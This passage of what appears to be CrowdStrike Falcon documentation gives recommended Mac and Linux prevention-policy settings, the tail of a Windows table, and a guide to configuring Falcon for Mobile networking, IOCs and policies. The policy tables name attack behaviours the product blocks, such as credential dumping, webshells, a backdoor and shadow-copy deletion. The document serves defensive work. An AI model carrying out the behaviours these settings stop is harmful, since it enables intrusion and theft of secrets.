Behavior-based Prevention	Exploit Mitigation	DEP Bypass Prevention	Off	Off	Off
Behavior-based Prevention	Exploit Mitigation	Heap Spray Pre-allocation Prevention	Off	Off	On
Behavior-based Prevention	Exploit Mitigation	NULL Page Allocation Prevention	Off	On	On
Behavior-based Prevention	Exploit Mitigation	SEH Overwrite Prevention	Off	On	On
Behavior-based Prevention	Ransomware	Backup Deletion Prevention	On	On	On
Behavior-based Prevention	Ransomware	Cryptowall Prevention	On	On	On
Behavior-based Prevention	Ransomware	File Encryption Prevention	On	On	On
Behavior-based Prevention	Ransomware	Locky Prevention	On	On	On
Behavior-based Prevention	Ransomware	File System Access Prevention	On	On	On
Behavior-based Prevention	Ransomware	Volume Shadow Copy - Audit	Off	On	On
Behavior-based Prevention	Ransomware	Volume Shadow Copy - Protect	Off	Off	On
Behavior-based Prevention	Exploitation Behavior	Application Exploitation Prevention	On	On	On
Behavior-based Prevention	Exploitation Behavior	Chopper Webshell Prevention	On	On	On
Behavior-based Prevention	Exploitation Behavior	Drive-by Download Prevention	On	On	On
Behavior-based Prevention	Exploitation Behavior	Code Injection Prevention	On	On	On
Behavior-based Prevention	Exploitation Behavior	JavaScript Execution Via Rundll32 Prevention	On	On	On
Behavior-based Prevention	Lateral Movement and Credential Access	Windows Logon Bypass ("Sticky Keys") Prevention	On	On	On
Behavior-based Prevention	Lateral Movement and Credential Access	Credential Dumping Prevention	On	On	On
Behavior-based Prevention	Remediation	Advanced Remediation	On	On	On
Behavioral detections	Cloud-based detections	Cloud-based anomalous process execution	Cautious	Moderate	Moderate

* Co-resident antivirus products - particularly anything with any form of On-Access Scanner (OAS) - should be disabled and/or uninstalled after enabling Sensor ML Prevention and Quarantine & Security Center Registration.

Mac prevention policy setting recommendations - three-phase view

Type	Category	Setting	Phase 1 - For rapid deployment with pre-existing AV	Phase 2 - Interim protection level	Phase 3 - Optimal protection
Sensor Capabilities	-	End User Notifications	Customer preference	Customer preference	Customer preference
Sensor Capabilities	-	Unknown Executable Analysis and Unknown Detection-Related Executable Analysis	On	On	On
Sensor Capabilities	-	Sensor Tamper Prevention	On	On	On
Sensor Capabilities	-	Suspicious File QuickScan Pro Analysis	Customer preference	Customer preference	Customer preference
Sensor Visibility	Enhanced Visibility	Enhanced Network Visibility	On	On	On
Sensor Visibility	Enhanced Visibility	Script-Based Execution Visibility	On	On	On
Next-Gen Antivirus	Cloud Machine Learning	Cloud-Based Anti-Malware - Detection	Moderate	Aggressive	Aggressive
Next-Gen Antivirus	Cloud Machine Learning	Cloud-Based Anti-Malware - Prevention	Disabled	Moderate	Moderate+
Next-Gen Antivirus	Cloud Machine Learning	Cloud-Based Adware & Pup - Detection	Moderate	Aggressive	Aggressive
Next-Gen Antivirus	Cloud Machine Learning	Cloud-Based Adware & Pup - Prevention	Disabled	Moderate	Moderate+
Next-Gen Antivirus	Sensor Machine Learning	Sensor-Based Anti-Malware - Detection	Moderate	Aggressive	Aggressive
Next-Gen Antivirus	Sensor Machine Learning	Sensor-Based Anti-Malware - Prevention	Disabled	Moderate	Moderate+
Next-Gen Antivirus	Sensor Machine Learning	Sensor Adware & PUP - Detection	Moderate	Aggressive	Aggressive
Next-Gen Antivirus	Sensor Machine Learning	Sensor Adware & PUP - Prevention	Disabled	Moderate	Moderate+
Next-Gen Antivirus	On Write	Detect on Write	On	On	On
Next-Gen Antivirus	On Write	Quarantine on Write	Off	On	On
Next-Gen Antivirus	Quarantine	Quarantine	Off	On*	On
Malware Protection	Execution Blocking	Custom Indicator Blocking	On	On	On
Malware Protection	Execution Blocking	Suspicious Process Prevention	Off	On	On
Malware Protection	Execution Blocking	Intelligence-Sourced Threat Prevention	On	On	On
Behavior-based Prevention	Unauthorized Remote Access IOAs	XPCOM Shell Prevention	On	On	On
Behavior-based Prevention	Unauthorized Remote Access IOAs	Chopper Webshell Prevention	On	On	On
Behavior-based Prevention	Unauthorized Remote Access IOAs	Empyre Backdoor Prevention	On	On	On
Behavior-based Prevention	Credential Dumping IOAs	KcPassword Decoded Prevention	On	On	On
Behavior-based Prevention	Credential Dumping IOAs	Hash Collector Prevention	On	On	On

* Co-resident antivirus products - particularly anything with any form of On-Access Scanner (OAS) - should be disabled and/or uninstalled after enabling Quarantine.

Linux prevention policy recommendations - three-phase view

Type	Category	Setting	Phase 1 - For rapid deployment with pre-existing AV	Phase 2 - Interim protection level	Phase 3 - Optimal protection
Sensor Capabilities	-	Unknown Executable Analysis and Unknown Detection-Related Executable Analysis	On	On	On
Sensor Capabilities	-	Sensor Tamper Prevention	On	On	On
Sensor Capabilities	-	Suspicious File QuickScan Pro Analysis	Customer preference	Customer preference	Customer preference
Sensor Visibility	Enhanced Visibility	Script-Based Execution Visibility	On	On	On
Sensor Visibility	Enhanced Visibility	SSH Visibility	On	On	On
Sensor Visibility	Enhanced Visibility	Filesystem Visibility	On	On	On
Sensor Visibility	Enhanced Visibility	Network Visibility	On	On	On
Sensor Visibility	Enhanced Visibility	HTTP Visibility	On	On	On
Sensor Visibility	Enhanced Visibility	FTP Visibility	On	On	On
Sensor Visibility	Enhanced Visibility	TLS Visibility	On	On	On
Sensor Visibility	Enhanced Visibility	Email Protocol Visibility	On	On	On
Sensor Visibility	Enhanced Visibility	Extended Command Line Visibility	On	On	On
Sensor Visibility	Enhanced Visibility	Memory Visibility	On	On	On
Sensor Visibility	Enhanced Visibility	D-Bus Visibility	On	On	On
Sensor Visibility	Enhanced Visibility	Enhance PHP Visibility	On	On	On
Sensor Visibility	Enhanced Visibility	Enhance Systemd Visibility	On	On	On
Sensor Visibility	Enhanced Visibility	PHP Script Optimization	Customer preference	Customer preference	Customer preference
Sensor Visibility	Enhanced Visibility	Environment Variable Visibility	On	On	On
Next-Gen Antivirus	Cloud Machine Learning	Cloud-Based Anti-Malware - Detection	Moderate	Aggressive	Aggressive
Next-Gen Antivirus	Cloud Machine Learning	Cloud-Based Anti-Malware - Prevention	Disabled	Moderate	Moderate+
Next-Gen Antivirus	On Write	On Write Script File Visibility	On	On	On
Next-Gen Antivirus	Sensor Machine Learning	Sensor-Based Anti-Malware - Detection	Moderate	Aggressive	Aggressive
Next-Gen Antivirus	Sensor Machine Learning	Sensor-Based Anti-Malware - Prevention	Disabled	Moderate	Moderate+
Next-Gen Antivirus	Quarantine	Quarantine	Off	On	On
Malware Protection	Execution Blocking	Custom Indicator Blocking	On	On	On
Malware Protection	Execution Blocking	Suspicious Process Prevention	Off	On	On
Container Protection	Execution Blocking	Container Drift Prevention	Off	Off	Off

* Co-resident antivirus products - particularly anything with any form of On-Access Scanner (OAS) - should be disabled and/or uninstalled after enabling Quarantine.

Configuring Falcon for Mobile

Manage mobile sensor settings, policies, custom IOCs, and protected Android apps. View mobile detections and events.

Overview

Falcon for Mobile lets you see events from Android, iOS, and iPadOS devices in your environment.

After deploying Falcon for Mobile and enrolling mobile devices, use the Falcon console to configure mobile policies. Mobile policies consist of sensor settings that are applied to hosts based on assigned host groups.

You can also use the Falcon console to manage mobile hosts and view detections and events.

For more info about deploying Falcon for Mobile, see:

Deploying Falcon for Mobile to Android Devices
Deploying Falcon for Mobile to iOS Devices

Tip: For info about how policies work, including host group assignment and policy precedence, see Policies in Falcon.

Requirements

Subscription: Falcon for Mobile

Note: Falcon for Mobile includes Falcon Insight XDR
OS support:
- Android 9.0 and later
- iOS 16 and later
Clouds: Available for all clouds
Roles: Falcon Administrator or Mobile Admin

Integrating with an MDM for remediation actions

Integrate with Microsoft Intune or Omnissa Workspace ONE to gain greater flexibility and control over how Falcon for Mobile responds to potential threats.

Configure this integration after deploying Falcon for Mobile to your devices. For more info, see:

Integrating Falcon for Mobile with Microsoft Intune for Remediation Actions
Integrating Falcon for Mobile with Omnissa Workspace ONE for Remediation Actions

Note: Falcon for Mobile supports integrating with only one MDM at a time. Do not configure both Workspace ONE and Microsoft Intune for remediation actions as this will result in unexpected behavior.

Using multi-factor authentication with FalconID

Falcon for mobile integrates with Falcon Identity Protection to provide a phish-resistant multi-factor authentication solution. For more info, see FalconID.

Network protection

The network connections that Falcon for Mobile can monitor depend on your deployment and configuration method. This also applies to connections that can be blocked, such as through network containment or custom IOCs.

For Android hosts, you must have the Falcon for Mobile VPN or the proxy configured. With the VPN, the sensor can monitor network connections of all installed apps for the profile that Falcon for Mobile is installed in. The proxy is supported for devices with a single profile and can monitor connections for all apps. For more info about profiles, see Android profiles. For more info about configuring the VPN or proxy, see Protecting network activity on Android devices.
For iOS hosts, the deployed configuration profile type determines which connections are monitored.
- For supervised devices using a Content Filter profile, the sensor can monitor all network connections.
- For unmanaged devices, or for managed, unsupervised devices using a Per-App VPN created through the Falcon console, the sensor monitors connections made through the Safari browser and in-app Safari WebViews.
  Note: There are some restrictions with how custom IOCs are applied for this type of Per-App VPN profile. For more info, see Considerations with mobile IOCs.
- For managed, unsupervised devices using a manually created Per-App VPN profile, the sensor monitors connections for protected apps. Due to a limitation with iOS, the Per-App VPN profile can’t be applied to Safari, however, you can monitor specified Safari domains if supported by the MDM.
  Note: To respect end-user privacy, there are limitations on the data Falcon for Mobile collects in unmanaged environments.

You can optionally send notifications to end users when connections are blocked. For more info, see End-user notifications.

Android profiles

Falcon for Mobile can monitor and protect network activity within the profile that it's deployed to.

For example, if your devices are company-owned and fully managed by an MDM, there is usually only one profile on the device. All apps are installed in and run from that profile, and Falcon for Mobile can see network activity from all apps. In the case of a BYOD environment, users' devices might have a personal profile plus a work profile deployed to it. In this case, Falcon for Mobile is typically deployed to the work profile and can see only network activity from apps installed in that profile.

For more general info on Android profiles, see the documentation for Android Enterprise.

Mobile policy sensor settings

Mobile policies contain sensor settings that determine what sort of activity triggers a detection or preventative action.

Recommended mobile policy settings

Mobile policy configuration typically depends on your specific use cases and needs. The table describes a common policy configuration that balances security, visibility, and end user experience.

Mobile policy setting

Recommendation

Block malicious network connections

Enabled

See Network preventions.

Allow remote log collection

Enabled

See Application log collection.

Connected Wi-Fi networks

Enabled

After enabling, end users must allow precise location permissions on their devices. Some MDMs might allow automatically granting this permission for Android devices.

Note: Location permissions are not required for Wi-Fi information to work on iOS Per-App VPN (unsupervised) deployments.

If this setting is disabled, or the permission isn’t granted on devices, or only the coarse/approximate location permission is granted, you can’t monitor which Wi-Fi access points users connect to and when they disconnect.

See Access to sensitive data types.

Note: Falcon for Mobile never collects precise geolocation information using the device’s location services, even when this setting is enabled.

Connected Bluetooth devices

Disabled

If there is no need to review the exact accessory connections made by devices, then this setting can be disabled. If you enable this setting, end users must allow Bluetooth permissions. Some MDMs might allow automatically granting this permission.

See Access to sensitive data types.

Note: Falcon for Mobile never collects precise geolocation information using the device’s location services, even when this setting is enabled.

Network contain during MITM attacks

Disabled

Start with this setting disabled until you’re confident that no corporate Wi-Fi access points trigger the SecureTrafficDecrypted detection.

See Automatic network containment.

Monitor network using VPN

Android only

Enabled

See Protecting network activity on Android devices.

Remote attestation

Android only

Enabled

See Device integrity for Android devices.

Currently installed apps

Android only

Enabled

This setting provides visibility into app-related threats. Only disable this setting if there are strong privacy concerns from end users on their BYOD devices.

See Access to sensitive data types.

Allow upload of APK files

Android only

Enabled

This setting helps discover unknown malware or risky apps. If your organization develops custom corporate apps that are sideloaded on the device (distributed outside Google Play Store), consider disabling this setting. This ensures that CrowdStrike doesn't have access to these apps.

See Access to sensitive data types.

Filename visibility

Android only

Disabled

See Access to sensitive data types.

Access to sensitive data types

Falcon for Mobile has several mobile policy settings to enable visibility into sensitive data types.

Setting	Description	Related events
Allow upload of APK files	Upload the APK files of installed Android apps to CrowdStrike for Falcon Intelligence analysis. For more info, see Uploading Android APKs for analysis. Note: When using this feature, we recommend enabling the Currently installed apps setting to help correlate installed apps with provided reports.	Not applicable
Connected Wi-Fi networks	View the Wi-Fi networks mobile hosts are connected to.	WiFiConnect WiFiDisconnect
Connected Bluetooth devices	View the Bluetooth devices and Bluetooth MAC addresses that mobile hosts are connected to. For Android, this setting applies only to Bluetooth Classic devices. For iOS, this setting applies only to Bluetooth Low Energy (LE) devices.	AccessoryConnected AccessoryDisconnected
Currently installed apps (Android only)	View apps currently installed on mobile hosts.	AndroidManifestFragmentData AppSideLoaded AppUninstalled DebuggableFlagTurnedOn HarmfulAppData MobileAppIdentifiers Note: The MobileAppIdentifiers and AppUninstalled events can be sent for suspicious apps even when this setting is disabled. For more info, see Detecting suspicious Android apps.
Filename visibility (Android only)	View the names of files written to external storage. Note: Due to Android application permissions, this is supported only by Android OS versions 10 and earlier.	RemovableMediaFileWritten

When deploying Falcon for Mobile, the CrowdStrike Falcon app requires permission to access some of these sensitive data types. For more info, see:

Android: Granting access to potentially sensitive information
iOS: Granting access to potentially sensitive information

Note: Falcon for Mobile never collects precise geolocation information using the device’s location services, even when location or Bluetooth permissions are granted. However, Falcon for Mobile does generate a general location for a device based on IP address geolocation, regardless of permissions.

Important: The data that can be collected by enabling these settings might be legally protected in some countries. Be certain you are aware of all privacy laws and regulations for all of your potential CrowdStrike Falcon app users.

Uploading Android APKs for analysis

If you have a Falcon Prevent subscription and any Falcon Intelligence subscription, you can automatically submit Android APKs to Falcon Intelligence for analysis.

When the Allow upload of APK files mobile policy setting is enabled, the sensor checks the apps installed on protected devices. Apps that CrowdStrike hasn’t seen before are uploaded. If an app is deemed suspicious, Falcon Sandbox detonates the APK and performs a thorough analysis. When finished, Falcon Intelligence provides a comprehensive report to help you determine if an app could be malicious. This data also helps improve Falcon’s ability to detect and identify future threats. For more info about Falcon Intelligence and Falcon Sandbox reports, see Sandbox.

To limit the impact on device performance and network consumption, apps are uploaded only when a device is connected to Wi-Fi and is plugged in.

To simplify correlation of installed apps on Falcon for Mobile devices with Falcon Intelligence reports on analyzed APKs, we recommend enabling the Currently installed apps mobile policy setting.

If you don’t want to automatically upload apps from users’ devices, perhaps due to privacy laws and regulations in your country, you can also manually submit individual APKs for analysis. For more info, see Submit for analysis in Sandbox.

Detecting suspicious Android apps

Regardless of how the Currently installed apps and Allow upload of APK files policy settings are configured, Falcon for Mobile generates and sends these events:

All sensor versions: HarmfulAppData is sent for apps marked as harmful by Google’s VerifyApps.
Sensor version 2022.01.3110002 and later:
- MobileAppIdentifiers is sent when a suspicious app is detected.
- AppUninstalled is sent when a suspicious app is uninstalled.

An installed app is considered suspicious if:

The app is marked by Google’s VerifyApps as harmful.
The app isn’t marked as harmful by VerifyApps but has the same package name as an app that was previously installed on the device that was marked as harmful.

Automatic network containment

The Network contain during MITM attacks policy option automatically contains hosts during a man-in-the-middle (MITM) attack.

An automatically contained host is isolated from all network activity. The host remains contained for the duration of the MITM attack, and the sensor automatically lifts containment when the attack is no longer detected.

Unlike manual network containment, sensors on hosts that are automatically contained block all network connections. This includes connections to IP addresses allowlisted in the containment policy and connections to the CrowdStrike Cloud, which prevents usage of the compromised network connection. Because of this, you can’t manually lift containment caused by a detected MITM attack.

The sensor attempts to establish a trustworthy connection to the CrowdStrike cloud as soon as possible. If the sensor can’t immediately reconnect, it will periodically retry the connection. After a trustworthy connection is established, the sensor lifts containment, and network access is restored to the device. Any sensor events generated during the MITM attack are sent to the CrowdStrike cloud.

Note: The network connections that the sensor can block depends on your deployment and configuration method. For more info, see Network protection.

You can optionally send notifications to end users when connections are blocked. For more info, see End-user notifications.

Important: If you use FalconID for multi-factor authentication, be aware that FalconID is disabled during network containment. Users can’t authenticate with FalconID until containment is lifted.

Network preventions

Falcon for Mobile can prevent malicious connections on your mobile devices by blocking IP addresses and domains that have a poor reputation.

Protect your mobile devices from malicious connections by enabling Block malicious network connections in your mobile policies. When this setting is enabled, Falcon for Mobile checks the domain or IP address in a connection to determine if it’s malicious. For URLs, Falcon for Mobile evaluates the domain portion. If the IP address or domain is known to be malicious, Falcon for Mobile blocks the connection and generates a detection.

If this setting is disabled, Falcon for Mobile won’t block malicious connections but will generate detections.

You can optionally send notifications to end users when connections are blocked. For more info, see End-user notifications.

Falcon for Mobile evaluates and blocks connections based on any of the following criteria:

Matching domains or IP addresses against a cloud blocklist
High-severity indicators marked as mobile by Counter Adversary Operations
Phishing links from third-party sources

Tip: You can block specific domains or IP addresses with custom IOCs. For more info, see Managing custom IOCs for mobile devices.

Prevention considerations

If Falcon for Mobile is unable to get a timely response from the CrowdStrike cloud, a queried connection is allowed. If an allowed connection is later discovered to be malicious, Falcon for Mobile will terminate the connection if it’s still active and generate a remediation event.

Note: If you’re using a Content Filter profile with iOS devices, Falcon for Mobile is unable to terminate existing connections but can still generate a detection event. This limitation doesn’t exist for iOS devices using a Per-App VPN profile.
If you add custom indicators of compromise (IOCs) for mobile devices, the configured actions of those IOCs take precedence over network preventions. For example, you might have a domain blocked by network preventions that you want to allow access to. You can add an IOC with this domain and set the action to Detect only or Allow. For more info, see Managing custom IOCs for mobile devices.
To block malicious connections on Android devices, you must have the Falcon for Mobile VPN or the proxy configured. This can block connections for apps installed on the device. For more info about configuring the VPN or proxy, see Protecting network activity on Android devices.
For iOS devices:
- If you’re using a Content Filter profile with iOS version 15 or later and the iCloud Private Relay service is enabled on your device, malicious connections to IP addresses can’t be blocked when using Safari. Disable Private Relay or disable the allowCloudPrivateRelay setting in your MDM’s payload configuration. You can also block DNS resolution to certain iCloud domains. For more info, see Prepare Your Network or Web Server for iCloud Private Relay.
  
  Note: Malicious connections can still be blocked by domain regardless of Private Relay settings.
- If your iOS devices are supervised and you didn’t apply a Content Filter profile downloaded using the workflow in the Falcon console, additional configuration is recommended for users to see notifications for blocked connections. This can be done by creating a Notification profile for the CrowdStrike Falcon app with the Allow Notification and Show in Notification Center options enabled.
- If you’re using a Per-App VPN profile, make sure this profile is applied to any web browser apps used in your environment.
  
  Note: Due to a limitation with iOS, the Per-App VPN profile can’t be applied to Safari.

Protecting network activity on Android devices

You can monitor and protect network activity on your Android devices with the Falcon for Mobile VPN or on-device HTTP proxy.

The VPN and the proxy offer the same level of protection and can be configured together or independently of each other. However, we recommend configuring the VPN if possible. With the on-device proxy, it is up to apps to honor global proxy settings and in some cases, an app might not send traffic to the Falcon for Mobile proxy. This is not an issue with the VPN.

Note: You must have an MDM to configure the proxy.

There are some limitations when using the Falcon for Mobile VPN or on-device proxy while a third-party proxy server is also configured.

Using the Falcon for Mobile VPN with a third-party proxy server isn't supported for Android version 9.
Using the Falcon for mobile on-device proxy at the same time as a third-party proxy server isn't supported for any Android version.

This includes network-specific proxies, such as for Wi-Fi or mobile networks. This limitation doesn't apply to global proxies.

Using the Falcon for Mobile VPN

When the Monitor network using VPN mobily policy setting is enabled, you can view network events for all apps installed in the profile that Falcon for Mobile is deployed to. The VPN also blocks malicious connections if you have configured features such as network containment or custom IOCs.

For more info about profiles, see Android profiles.

Note: When you enable the VPN in a mobile policy, the VPN must also be enabled on devices protected by that policy. For more info, see Enabling the VPN on Android devices.

Multi-VPN support

You can configure the Falcon for Mobile VPN even if you have another VPN, such as a corporate VPN, configured on your Android profiles. Due to limitations with the Android OS, only one VPN can be active at a time on a profile. However, the Android sensor automatically connects the Falcon for Mobile VPN if the corporate VPN is disconnected. If your MDM is configured to allow users to disconnect from a VPN and a user manually disconnects the Falcon for Mobile VPN in their work profile, the Falcon VPN automatically reconnects after 5 minutes.

Keep in mind that if the corporate VPN is set as the Always on VPN in your MDM, the Falcon for Mobile VPN is unable to run and can’t provide network protection or visibility. Regardless of your VPN configuration, Falcon for Mobile can always monitor for device-level threats, such as malware or root detection.

VPN bypass

By default, all network traffic from applications is forwarded through the Falcon for Mobile VPN. In some cases, you might have an app that won’t work as expected if the app detects an active VPN. If you enroll devices to Falcon for Mobile using AppConfig in your MDM, you can specify a list of apps to bypass the VPN. For info on configuring AppConfig, see Appendix A: AppConfig settings for zero-touch enrollment.

Enabling the VPN on Android devices

When enabling the VPN in a mobile policy, the VPN must also be set up on devices protected by that policy.

Some MDMs allow you to automatically set up the VPN without user input by setting the Falcon app as the Always On VPN provider in the MDM. Although we recommend configuring this setting before enabling the VPN in a mobile policy, you can do so at any time. For more info, see your MDM’s documentation.

If you’re not using an MDM or don’t set the Falcon app as the VPN provider, users must set up the VPN through the Falcon app or a notification they receive on their devices. If they don’t set up the VPN, Falcon for Mobile can’t see network connectivity for installed apps and can’t generate network-related events.

Enable the VPN through the notification

After enabling the VPN in a mobile policy, protected devices automatically receive a notification to enable the VPN. Users must tap Enable in this notification.
The notification to enable the Falcon VPN

The notification to enable the Falcon VPN

Note: It can take up to 15 minutes for devices to receive the notification.

Enable the VPN through the Falcon app

If a user doesn’t see or dismisses the notification, they can set up the VPN through the Falcon app.

Open the Falcon app. The Status area appears on the landing page and displays the VPN status.
Tap VPN pending activation.

Using the Falcon for Mobile proxy

If your Android devices are fully managed by an MDM, you can configure Falcon for Mobile to act as an HTTP proxy. This is recommended for environments where devices can’t be continuously protected by the Falcon for Mobile VPN, such as when a corporate VPN is configured.

The proxy allows the Falcon sensor to see network activity for installed apps and block connections that Falcon determines to be malicious. The proxy runs only on devices that have Falcon for Mobile installed.

Proxy considerations

The Falcon for Mobile proxy is supported only on fully managed devices. For more info about fully managed devices, see the documentation for Android Enterprise.
Make sure that the CrowdStrike Falcon app is allowed to run in the background. If there are battery restrictions, the proxy might not be able to inspect traffic and network connectivity will fail. For more info, see Background activity restrictions.
The default proxy port is 4040. You can specify a different port if you use AppConfig in your MDM to enroll devices to Falcon for Mobile. For more info about AppConfig settings, see Deploying Falcon for Mobile to Android Devices: Appendix A: AppConfig settings for zero-touch enrollment.

Configuring the proxy in your MDM

In your MDM’s device network or connectivity settings, configure the Falcon for Mobile sensor as a localhost proxy with the following settings.

Note: These settings might vary depending on your MDM. Refer to your MDM’s documentation for more info about configuring proxy settings.

Type: Direct
Host: Localhost
Port number: 4040 (If you configured a different port in AppConfig, use that instead)

Important: Don’t configure the proxy for devices that aren’t protected by Falcon for Mobile. In your MDM, make sure the proxy is either assigned to the correct device groups or excludes unprotected devices.

In Microsoft Intune, for example, proxy settings are configured in Device restrictions in the Connectivity area.

Configuring the Falcon for Mobile proxy in Microsoft Endpoint Manager

End-user notifications

When Falcon for Mobile blocks a malicious connection, you can send a notification to the end user’s device informing them why the connection was blocked. You can also send a notification if Falcon for Mobile detects a malicious app on Android devices.

Notifications are configured on the Notifications tab in your mobile policies. These settings are available:

Network preventions notifications: Send a notification when Falcon for Mobile blocks a connection to a malicious domain or IP address.
MITM notifications: Send a notification when Falcon for Mobile detects a man-in-the-middle attack.
Network containment notifications: Send a notification when Falcon for Mobile contains a device from the network or lifts containment.
Malware detection notifications (Android-only): Send a notification when Falcon for Mobile detects malware on Android devices.

For info on how to enable notifications, see Configure end-user notifications.

Device integrity for Android devices

Falcon for Mobile detects compromised devices by verifying Android OS integrity against both Google’s validation service and Android Keystore. Falcon for Mobile can also determine if the Falcon app on a device is legitimate by verifying the signing certificate for the app.

To configure device integrity, enable Remote attestation in your mobile policies. We recommend having this setting enabled for all devices when possible. You might need to disable this setting for devices that don’t pass Android compatibility testing, such as point-of-sale devices or other devices running customized versions of Android, to avoid generating false positive detections.

Note: Google Play Store must be installed on all devices that have the Remote attestation setting enabled.

You can view integrity status by clicking a host in Host setup and management > Manage endpoints > Mobile hosts dashboard . The More details area displays the status for Device Trusted, Key Store Trusted, and Falcon App Trusted.

Devices with a status of True have passed those integrity checks.
Devices with a status of False have not passed those integrity checks.

Note: If Falcon is unable to process a response from Google’s servers, such as due to network connectivity issues, the status for that integrity check is False.
Devices with a status of - indicates that CrowdStrike hasn’t yet received relevant events from those devices.

Application log collection

To aid in troubleshooting, you can allow CrowdStrike to remotely collect application logs with the Allow remote log collection option. For more information, see Collecting application logs for troubleshooting.

Managing mobile policies

Configure sensor settings and assign host groups to policies.

Note: Falcon for Mobile can integrate with Microsoft Intune for remediation actions. For info on configuring remediation triggers in your mobile policies, see Integrating Falcon for Mobile with Microsoft Intune for Remediation Actions.

Mobile policies in multi-CID environments

If you use Falcon Flight Control, mobile policies created in the parent CID are available for use globally in all child CIDs. In a child CID, you can choose which host groups are assigned to an inherited policy. Inherited mobile policies are labeled with Global Admin on the Mobile policies page.

Aside from host group assignment, inherited policies can’t be modified in a child CID. However, you can duplicate policies inherited from the parent and then modify them as needed.

Mobile policies that are created in a child CID are fully managed in the child CID. These local policies don’t appear in the parent CID.

Locally created policies always have a higher precedence than inherited policies.

For more info about Falcon Flight Control, see Falcon Flight Control and Multi-CID Support.

Policy precedence

Like prevention policies, mobile policies use policy precedence to determine which policy is applied to a host.

A host can belong to multiple host groups and a host group can appear in multiple policies. If a host matches multiple policies, the policy with the highest precedence is applied to a host. Precedence is determined by the order of policies in the list of mobile policies. The policy at the top of the list has a precedence of 1. This has a higher precedence than the second policy in the list, which has a precedence of 2. The last policy in the list is always the Default Policy.

If a host is not assigned to a host group, or the groups it belongs to are not assigned to any enabled policies, the host is automatically assigned to the Default Policy.

If hosts are dynamically assigned to host groups, changing certain aspects of a host could change its host group membership and therefore change the host’s active policy. For example, if you use sensor tags to dynamically assign hosts to host groups, adding or removing tags assigned to a mobile device could change its assigned policy.

Create a mobile policy

Create and enable a mobile policy. You can have up to 100 mobile policies.

Go to Endpoint security > Configure > Mobile policies .
Click Create Policy.
Enter a policy name and optional description. Accepted characters are a-z, A-Z, 0-9, -, _, :, ;, ., !, and spaces.
Click Create Policy.
Click Enable.

Delete a policy

Delete a policy that is no longer needed. Policies must be disabled before they can be deleted.

If you want to keep a policy but not enforce it, disable the policy. Disabled policies still count towards the 100 policy limit.

Note: The default policy can’t be deleted.

Go to Endpoint security > Configure > Mobile policies .
Find the policy to delete and click Edit Policy.
If needed, click Disable to disable the policy.
Click Delete policy.

Edit mobile policy precedence

Policy precedence determines which policy is applied to a mobile host that matches multiple policies.

For more information, see Policy precedence.

Go to Endpoint security > Configure > Mobile policies .
Click Edit Precedence.
Drag and drop policies to the needed positions.

Note: The default policy always has the lowest precedence and cannot be reordered.
Click Save.

Configure sensor settings

Enable or disable sensor settings based on the requirements of your environment.

For more information about these settings, see Mobile policy sensor settings.

Go to Endpoint security > Configure > Mobile policies .
Find the policy to configure and click Edit Policy.
On the Sensor settings tab, enable or disable settings as needed.

Modifications are automatically saved and are pushed to devices immediately.

Assign or remove host groups

The host groups assigned to a policy determine which hosts the policy is applied to.

Go to Endpoint security > Configure > Mobile policies .
Find the policy to configure and click Edit Policy.
Click the Assigned host groups tab.
To add a host group to the policy:
1. Click Add groups to policy.
2. Select the group from the menu.
  
  Tip: Type the group name in the text field to dynamically search for groups.
3. To add another group, click Add another group to policy and select the group.
4. Click Add group(s).
To remove a group from the policy:
1. Locate the group and click Remove from policy.
2. Click Remove group from policy.

Configure end-user notifications

Configure when to send notifications to end users.

Go to Endpoint security > Configure > Mobile policies .
Find the policy to configure and click Edit Policy.
Click the Notifications tab.
Turn notifications on or off as needed.
- To turn off all notifications, select Disable all notifications.
- If Disable all notifications is selected, deselecting this setting re-enables any notifications that were previously enabled.

Managing custom IOCs for mobile devices

Indicators of compromise (IOCs) explicitly block or allow connections to specific domains and IP addresses on your mobile devices.

IOCs support these actions:

Block: If a mobile device tries to connect to the specified IP address or domain, the connection is blocked and a detection is generated.
Block, hide detection: The connection is blocked and a detection is generated, but the detection doesn’t appear in Endpoint security > Monitor > Mobile detections .
Detect only: The connection is allowed and a detection is generated.
Allow: The connection is allowed without generating a detection.
No action: Save the indicator for future use, but take no action.

Note: Hash IOCs aren’t supported for mobile devices.

For more info about IOCs, see Custom IOCs.

Considerations with mobile IOCs

For all device types:

If you have network preventions enabled, IOCs have a higher precedence. For example, you might have a domain blocked by network preventions that you want to allow access to. You can add an IOC with this domain and set the action to Detect only or Allow.
When configuring IOCs, changes are not effective immediately and could take up to several hours to take effect.

There is a limit to the number of mobile IOCs you can configure. For more info, see Mobile IOC limits.
All subdomain IOCs that appear in the IOC management page are prefixed with an asterisk. For example, if you add an IOC for subdomains of example.com, the IOC appears as *.example.com.
When configuring subdomain IOCs, exact matches take precedence over general matches. For example, if you allow all subdomains of example.com, but configure an IOC to block site1.example.com, the IOC for site1.example.com takes precedence and is blocked.
When configuring custom IOCs, you have the option to apply IOCs to specific host groups or all hosts. If you use Falcon Flight Control and you apply an IOC to all hosts from the parent CID, the IOC is applied to all hosts across all CIDs in your environment.

For Android devices:

You must have the Falcon for Mobile VPN or the proxy configured. Custom IOCs are applied to connections from apps installed on the device. For more info about configuring the VPN or proxy, see Protecting network activity on Android devices.

For supervised iOS devices using a Content Filter profile:

Falcon for Mobile applies custom IOCs to all network connections.
If the iCloud Private Relay service is enabled on your device, malicious connections to IP addresses can’t be blocked when using Safari. Disable Private Relay or disable the allowCloudPrivateRelay setting in your MDM’s payload configuration. You can also block DNS resolution to certain iCloud domains. For more info, see Prepare Your Network or Web Server for iCloud Private Relay.

Note: Malicious connections can still be blocked by domain regardless of Private Relay settings.
If you didn’t apply a Content Filter profile downloaded using the workflow in the Falcon console, additional configuration is recommended for users to see notifications for blocked connections. This can be done by creating a Notification profile for the CrowdStrike Falcon app with the Allow Notification and Show in Notification Center options enabled.

For unmanaged iOS devices or managed, unsupervised devices using a Per-App VPN created through the Falcon console:

Falcon for Mobile applies domain and subdomain IOCs to connections made through the Safari browser and in-app Safari WebViews.
IP address IOCs can’t be applied to Safari connections.

For managed, unsupervised devices using a manually created Per-App VPN:

Falcon for Mobile applies custom IOCs to connections made through apps that the Per-App VPN profile is applied to.
Due to a limitation with iOS, the Per-App VPN profile can’t be applied to Safari, however, you can monitor specified domains and top-level domains if supported by your MDM. IP address IOCs can’t be applied to Safari connections.

Mobile IOC limits

Falcon for Mobile limits the number of custom IOCs. The following table shows the approximate limits based on an average length or a maximum length of IOCs.

IOC Type	iOS sensor 2025.04.1 and earlier	Android; iOS sensor 2025.05.1 and later	Calculation Notes
Domains	1,925	154,199	Average of 14 characters Example: 0123456789.com
